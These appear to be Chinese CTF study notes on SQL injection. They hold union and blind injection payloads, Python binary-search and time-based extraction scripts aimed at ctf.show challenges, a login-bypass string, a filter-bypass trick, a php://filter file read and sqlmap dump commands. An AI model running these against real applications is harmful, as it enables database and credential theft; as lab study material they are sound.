HTTP&sql注入
HTTP&sql注入
http请求方式
- post
- get
- put
- head
http报头
- Refer:
sql盲注
1. 有查询结果返回的时候
-
获取数据库
前面的id需要查无结果的情况下,单引号代表跟前面的单引号闭合,有时可能要双引号(尝试调试可知),后面的--+是sql注释,注释掉后面的部分。
原始后台语句:select * from table where id='此处嵌入网页中id=后面的部分'id=-1' union select 1,2,...,group_concat(schema_name) from information_schema.schemata --+ -
获取数据表
id=-1' union select 1,2,...,group_concat(table_name) from information_schema.tables where table_schema=[database()] -
获取数据列
select 1,2,...,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -
获取值
select 1,2,...,group_concat(username,password) from users
2. 只有True和False返回的时候
-
{i}是截取查询结果第i个元素,mid是用二分法提升运算速度,if函数,判断条件为True返回1,否则返回0。然后遍历判断。
if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)%23 -
参考代码
import requests if __name__=="__main__": url='http://4c09e513-4b0f-4a02-b588-f348a25c0448.challenge.ctf.show:8080/?id=1%27 and ' result='' i=0 while True: i=i+1 low=32 high=127 while low<high: mid=(low+high)//2 #payload=f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)%23' #payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=%27ctfshow%27),{i},1))>{mid},1,0)%23' #payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=%27ctfshow%27 and table_name=%27flagjugg%27),{i},1))>{mid},1,0)%23' payload = f'if(ascii(substr((select group_concat(flag423) from ctfshow.flagjugg),{i},1))>{mid},1,0)%23' r=requests.get(url=url+payload) if 'You are in' in r.text: low=mid+1 else: high=mid if low!=32: result=result+chr(low) else: break print(result)
3. 时间盲注
-
观察请求延时判断。
xxx' and if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},sleep(0.5),0)%23' -
参考脚本
import requests if __name__ == '__main__': url = 'http://cbeb409a-91dd-4b51-a03e-0295776e36a5.challenge.ctf.show:8080/?id=1%27 and ' result = '' i = 0 while True: i = i + 1 low = 32 high = 127 while low < high: mid = (low + high) // 2 payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},sleep(0.5),0)%23' #payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},sleep(0.5),0)%23' #payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagug"),{i},1))>{mid},sleep(0.5),0)%23' #payload = f'if(ascii(substr((select group_concat(flag4a23) from ctfshow.flagug),{i},1))>{mid},sleep(0.5),0)%23' # print(payload) r = requests.get(url=url + payload) try: r = requests.get(url=url + payload, timeout=0.5) # 0.5s内必须返回结果,然后执行下面的语句,如果0.15s还没有结果,则执行except的内容 high = mid except: low = mid + 1 if low != 32: result += chr(low) #print(result) else: break print(result)
4. 万能密码
`1' or '1'='1`
5. 常用sql注释符
#%23--+--%20
6. 常用注入技巧
id=-1' order by 1【不断尝试order by获取当前数据库列数】=-1';use supersqli;show tables;desc1919810931114514;set @sql=concat('s','elect flag from1919810931114514');PREPARE stmt1 FROM @sql;EXECUTE stmt1;%23【绕过select等过滤的方法】?file=php://filter/read=convert.base64-encode/resource=flag.php【读取服务端文件,用base64可以避免php运行后注释消失,获取源码;当然方法有字符串过滤器,转换过滤器,压缩过滤器,加密过滤器四种】r = requests.get('http://cac4fc17-efcd-4248-9cbc-16b9428bdfe5.node4.buuoj.cn:81/action.php',allow_redirects=False)【采用allow_redirects=False阻止302跳转】
sqlmap
操作步骤:
-
查看数据库
sqlmap -u http://4221a56b-a478-4b11-b1ab-5ddb7c20f7fd.challenge.ctf.show:8080/?id=1 --dbs -
查看数据表
sqlmap -u http://4221a56b-a478-4b11-b1ab-5ddb7c20f7fd.challenge.ctf.show:8080/?id=1 --tables -D ctfshow -
查看列及数据
sqlmap -u http://4221a56b-a478-4b11-b1ab-5ddb7c20f7fd.challenge.ctf.show:8080/?id=1 -D ctfshow -T flagug --columns --dump
特殊情况
- post请求( 加参数 --data "id=1")
sqlmap -u http://test.com --data "id=1"
- 调用burpsuite抓包结果(加参数-r ),其中
a.txt是抓包记录,-p id是指定其中的id字段为注入字段(可选)。
sqlmap -r a.txt [-p id]